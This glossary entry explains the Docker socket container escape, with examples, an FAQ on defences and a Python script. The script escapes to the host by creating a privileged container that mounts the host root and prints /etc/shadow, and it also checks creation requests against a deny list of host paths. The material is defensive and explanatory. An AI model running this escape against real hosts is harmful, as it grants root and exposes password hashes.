Docker Socket Attack
What is Docker Socket Attack?
Abusing a container that has /var/run/docker.sock mounted to control the Docker daemon, escape the container, and gain root on the host.
The Docker socket /var/run/docker.sock is the control plane of the Docker daemon. The daemon runs as root on the host and performs no authentication of socket clients beyond the file's permissions (root or the docker group), so whoever can write to the socket can do anything the daemon can. When a container bind-mounts the socket (commonly done to give CI runners, monitoring agents, or sidecars access to Docker), every process inside can call the Engine API, which is plain HTTP over the Unix socket; the docker CLI is a convenience, not a requirement, since curl or a few lines of Python are enough. An attacker who reaches that container can ask the daemon to create a new privileged container that bind-mounts the host filesystem at /, then read /etc/shadow, drop a backdoor into the host's cron or SSH configuration, or start the container with --pid=host and --net=host to work directly in the host's namespaces. Because the new container is created by the daemon and not by the compromised one, seccomp and AppArmor profiles, dropped capabilities, and read-only mounts on the original container do not help. Mitigations: never bind-mount docker.sock into containers that run untrusted code or are reachable by untrusted users; run rootless Docker so that the daemon, and every container it spawns, is an unprivileged user on the host; if remote access is needed, expose the daemon over TCP with TLS client certificates (mTLS) rather than sharing the socket; and replace direct socket access with tools that do not need it, such as kaniko for daemonless image builds or sysbox, a runtime that lets a container run its own Docker without the host socket, or put a filtering proxy in front of the socket that forwards only the API endpoints the workload needs and rejects container creation requests that are privileged or bind-mount host paths.
● Examples
- 01
Compromising a Jenkins agent container that mounts /var/run/docker.sock so pipeline steps can run docker build, then using that socket to start a new container with --privileged -v /:/host and chroot /host to act as root on the node.
- 02
An attacker who gains code execution inside a Portainer container uses its bound socket to enumerate every container on the host and start new containers that run as root with the host filesystem mounted.
● Frequently asked questions
What is Docker Socket Attack?
Abusing a container that has /var/run/docker.sock mounted to control the Docker daemon, escape the container, and gain root on the host. It belongs to the Attacks & Threats category of cybersecurity.
What does Docker Socket Attack mean?
Abusing a container that has /var/run/docker.sock mounted to control the Docker daemon, escape the container, and gain root on the host.
How does Docker Socket Attack work?
Any process in a container that has /var/run/docker.sock mounted can talk to the Docker daemon, which runs as root on the host and does not authenticate socket clients beyond the file's permissions. The attacker sends the daemon a container-create request for a privileged container that bind-mounts the host's / (optionally sharing the host PID and network namespaces), starts it, and then reads or modifies the host filesystem from inside it, for example to read /etc/shadow or plant a backdoor. The hardening of the compromised container is irrelevant, because the daemon, not that container, creates the new one.
How do you defend against Docker Socket Attack?
Defences combine prevention and detection. Prevention: do not mount /var/run/docker.sock into containers that run untrusted code; run rootless Docker so that an escape yields an unprivileged host user rather than root; replace socket access with daemonless tooling such as kaniko for image builds, or with a filtering proxy that exposes only the API endpoints a workload needs and rejects container-create requests that set Privileged, bind-mount host paths (including the socket itself), or use host PID, network or IPC mode; and keep the socket's file permissions and docker group membership on the host to a minimum. Detection: alert on container creation with --privileged, a bind mount of / or of the socket, or host namespaces (from the daemon's events stream or an audit rule watching the socket file), and treat any container that mounts the socket as equivalent to root on that node in threat models and access reviews.
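The escape described in the definition above and the request-time policy check from the defence answer are both shown in the following Python script. It is an added example written for this page, not code from Docker or from any product named here. It assumes the socket path /var/run/docker.sock, Engine API version v1.41, and an alpine image already present on the host; the HOST_PATHS list in create_request_risks is a hypothetical deny policy, not a Docker setting. Only the standard library is used, because the point is that an attacker inside the container needs no docker CLI, just something that can speak HTTP over a Unix socket.

```python
# Added example (not Docker's code): Engine API abuse over docker.sock, plus the
# policy check a filtering proxy or authz plugin in front of the socket would apply.
import http.client
import json
import os
import socket
import stat

DOCKER_SOCK = "/var/run/docker.sock"
API = "/v1.41"  # assumption: the daemon accepts API 1.41 (older 1.2x work too)
# Hypothetical policy: bind-mounting any of these host paths means host takeover.
HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over a Unix socket; the daemon speaks plain HTTP/1.1 on it."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def socket_exposed(path=DOCKER_SOCK):
    """The attack precondition: a Unix socket at path that this process may write to."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISSOCK(st.st_mode) and os.access(path, os.W_OK)


def escape_spec(image="alpine", host_root="/host", cmd=None):
    """Body for POST /containers/create, equivalent to
    docker run --privileged --pid=host --net=host -v /:/host IMAGE CMD."""
    return {
        "Image": image,
        "Cmd": cmd or ["sh", "-c", "cat %s/etc/shadow" % host_root],
        "Tty": True,  # raw log stream instead of the 8-byte-framed multiplex
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:%s" % host_root],
            "PidMode": "host",
            "NetworkMode": "host",
        },
    }


def api(conn, method, path, body=None):
    """One Engine API call: returns (status, parsed JSON or raw bytes)."""
    data = json.dumps(body).encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if data else {}
    conn.request(method, API + path, body=data, headers=headers)
    resp = conn.getresponse()
    raw = resp.read()
    if (resp.getheader("Content-Type") or "").startswith("application/json"):
        return resp.status, json.loads(raw or b"null")
    return resp.status, raw


def run_escape(sock_path=DOCKER_SOCK, spec=None):
    """Create, start and wait for the escape container; return what it printed.
    Each step is an ordinary API call that the daemon carries out as host root."""
    spec = spec or escape_spec()
    conn = UnixHTTPConnection(sock_path)
    status, created = api(conn, "POST", "/containers/create", spec)
    if status != 201:
        raise RuntimeError("create failed: %s %r" % (status, created))
    cid = created["Id"]
    api(conn, "POST", "/containers/%s/start" % cid)
    api(conn, "POST", "/containers/%s/wait" % cid)
    _, logs = api(conn, "GET", "/containers/%s/logs?stdout=1&stderr=1" % cid)
    return logs.decode(errors="replace")


def create_request_risks(spec):
    """Reasons a /containers/create body hands over the host (empty list = allow)."""
    hc = spec.get("HostConfig", {})
    risks = []
    if hc.get("Privileged"):
        risks.append("privileged")
    # Both spellings of a bind mount: legacy "Binds" strings and "Mounts" objects.
    sources = [b.split(":", 1)[0] for b in hc.get("Binds") or []]
    sources += [m.get("Source", "") for m in hc.get("Mounts") or []
                if m.get("Type") == "bind"]
    for src in sources:
        if src in HOST_PATHS or any(src.startswith(p + "/")
                                    for p in HOST_PATHS if p != "/"):
            risks.append("host bind " + src)
    for key in ("PidMode", "NetworkMode", "IpcMode"):
        if hc.get(key) == "host":
            risks.append("%s=host" % key)
    return risks


if __name__ == "__main__":
    if socket_exposed():
        print(run_escape())  # only reachable where the socket is really mounted
    else:
        print("no writable docker.sock; policy verdict on the escape request:",
              create_request_risks(escape_spec()))
```

Run inside a container to see which branch you are in: with the socket mounted, run_escape returns the host's /etc/shadow, which is the whole attack. Without it, the script only reports what create_request_risks would say about that request, which is the decision a proxy in front of the socket should make before forwarding anything to the daemon. Note that the check inspects the create body, not the caller: a socket client that is allowed to create containers at all must be constrained by request shape, because the daemon itself will honour any field it is sent.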
What are other names for Docker Socket Attack?
Common alternative names include: docker.sock mount escape, Container escape via Docker socket.
● Related terms
- cloud-security№ 211
Container Escape
An exploit that breaks the isolation boundary between a container and its host, giving the attacker code execution on the underlying node or kernel.
- cloud-security№ 213
Container Security
The practice of securing container images, registries, orchestrators, and the runtime in which containers execute.
- attacks№ 1116
Supply Chain Attack
An attack that compromises a trusted third-party software, hardware, or service provider in order to reach its downstream customers.
- vulnerabilities№ 860
Privilege Escalation
A class of vulnerabilities that lets an attacker gain rights beyond those originally granted, such as moving from a normal user to administrator.